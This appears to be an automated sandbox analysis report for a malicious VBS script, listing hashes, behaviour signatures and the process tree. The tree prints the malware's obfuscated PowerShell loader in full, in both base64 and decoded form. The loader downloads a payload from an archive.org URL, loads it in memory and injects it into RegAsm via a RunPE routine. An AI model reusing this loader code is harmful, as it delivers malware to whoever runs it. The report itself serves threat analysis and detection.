Analysis
-
max time kernel
148s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
-
submitted
02/10/2024, 03:31
General
-
Target
da78b6a3b5c884402e96f23552ee698fa93eeb0f3f2d5000c4eacceb3e0e9200.vbs
-
Size
252KB
-
MD5
9503d35044eaa634d441efcd5f0426fb
-
SHA1
b201d07cbbd3050d66f1354585ab05751ff126ac
-
SHA256
da78b6a3b5c884402e96f23552ee698fa93eeb0f3f2d5000c4eacceb3e0e9200
-
SHA512
96a7bf85e9db2946d3b82b611a130030c569909ca4f9b4779cabe64be79e830afcdbb4246f3f7743abdd3a526195a022a07faf116b4df3556342e99a45bd2d62
-
SSDEEP
6144:fNApeDCCDlXetMRebQwWtUWBbd5dgufzibtf7q6dTe9:lApeDC2lXetMR6QRtrbd5KufziZ7Rda9
Malware Config
Extracted
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt
Signatures
-
Blocklisted process makes network request 2 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
-
Suspicious use of WriteProcessMemory 4 IoCs
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\da78b6a3b5c884402e96f23552ee698fa93eeb0f3f2d5000c4eacceb3e0e9200.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezAnKyd9dScrJ3JsJysnID0gezEnKyd9aHR0cCcrJ3M6JysnLy9pYTYwJysnMDEwMC51cy5hcmNoaXZlJysnLm9yZy8nKycyNC9pdCcrJ2VtJysncy9kZXRhaC1ub3QnKydlLXYnKycvRGV0JysnYWhOb3RlJysnVi50eHR7MScrJ30nKyc7ezB9YmFzZTY0Q28nKydudGVudCAnKyc9ICgnKydOJysnZXctT2JqZWN0IFMnKyd5Jysnc3RlbS5OZXQuJysnV2UnKydiQ2xpJysnZW50KS5Eb3duJysnbG8nKydhZFMnKyd0cmknKyduJysnZycrJyh7MH11cmwpO3snKycwfScrJ2JpbmFyeUMnKydvbicrJ3RlbnQgPSAnKydbJysnU3lzdGVtLicrJ0MnKydvbnZlcnRdJysnOjpGcicrJ29tQmFzZScrJzY0U3RyaW5nKHswfWJhc2U2NEMnKydvbnRlbicrJ3QpO3snKycwfWEnKydzc2VtYmx5ID0gJysnWycrJ1InKydlJysnZicrJ2wnKydlY3RpJysnb24uQXMnKydzZW1iJysnbHldOjpMb2FkKHswfWJpJysnbmFyeUNvbicrJ3QnKydlJysnbnQnKycpO3swfXR5cCcrJ2UgPSB7MH0nKydhc3NlbWInKydseS5HZXRUeXBlJysnKHsxfVJ1bicrJ1BFLicrJ0hvbWV7MX0pOycrJ3swJysnfW1lJysndGhvZCA9IHswfXR5JysncGUuJysnRycrJ2V0TWV0JysnaG9kKCcrJ3snKycxfVZBJysnSXsxfSk7ezB9JysnbWV0JysnaCcrJ28nKydkLkludm9rZScrJyh7MH1udWxsLCBbbycrJ2InKydqZWN0JysnW10nKyddQCh7MX10JysneHQuJysnRUMnKydET0wvMCcrJzAnKycyLzAzLicrJzMyMi4zJysnLicrJzI5JysnMS8vOnAnKyd0dGh7MScrJ30gLCcrJyB7MX0nKydkZXNhdGknKyd2JysnYScrJ2QnKydvezF9ICcrJywgezF9ZGVzJysnYXRpdmFkbycrJ3snKycxfScrJyAsIHsxfScrJ2QnKydlc2EnKyd0aXZhJysnZCcrJ297JysnMX0sezEnKyd9UmVnQXNtezF9JysnLHsxJysnfXsnKycxfSknKycpJyktZltjSGFyXTM2LFtjSGFyXTM5KSB8IElFeA==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0'+'}u'+'rl'+' = {1'+'}http'+'s:'+'//ia60'+'0100.us.archive'+'.org/'+'24/it'+'em'+'s/detah-not'+'e-v'+'/Det'+'ahNote'+'V.txt{1'+'}'+';{0}base64Co'+'ntent '+'= ('+'N'+'ew-Object S'+'y'+'stem.Net.'+'We'+'bCli'+'ent).Down'+'lo'+'adS'+'tri'+'n'+'g'+'({0}url);{'+'0}'+'binaryC'+'on'+'tent = '+'['+'System.'+'C'+'onvert]'+'::Fr'+'omBase'+'64String({0}base64C'+'onten'+'t);{'+'0}a'+'ssembly = '+'['+'R'+'e'+'f'+'l'+'ecti'+'on.As'+'semb'+'ly]::Load({0}bi'+'naryCon'+'t'+'e'+'nt'+');{0}typ'+'e = {0}'+'assemb'+'ly.GetType'+'({1}Run'+'PE.'+'Home{1});'+'{0'+'}me'+'thod = {0}ty'+'pe.'+'G'+'etMet'+'hod('+'{'+'1}VA'+'I{1});{0}'+'met'+'h'+'o'+'d.Invoke'+'({0}null, [o'+'b'+'ject'+'[]'+']@({1}t'+'xt.'+'EC'+'DOL/0'+'0'+'2/03.'+'322.3'+'.'+'29'+'1//:p'+'tth{1'+'} ,'+' {1}'+'desati'+'v'+'a'+'d'+'o{1} '+', {1}des'+'ativado'+'{'+'1}'+' , {1}'+'d'+'esa'+'tiva'+'d'+'o{'+'1},{1'+'}RegAsm{1}'+',{1'+'}{'+'1})'+')')-f[cHar]36,[cHar]39) | IEx"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
Filesize
64B
MD5d8b9a260789a22d72263ef3bb119108c
SHA1376a9bd48726f422679f2cd65003442c0b6f6dd5
SHA256d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc
SHA512550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
2.0MB
-
Filesize
8KB
-
Filesize
136KB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
8KB
-
Filesize
10.8MB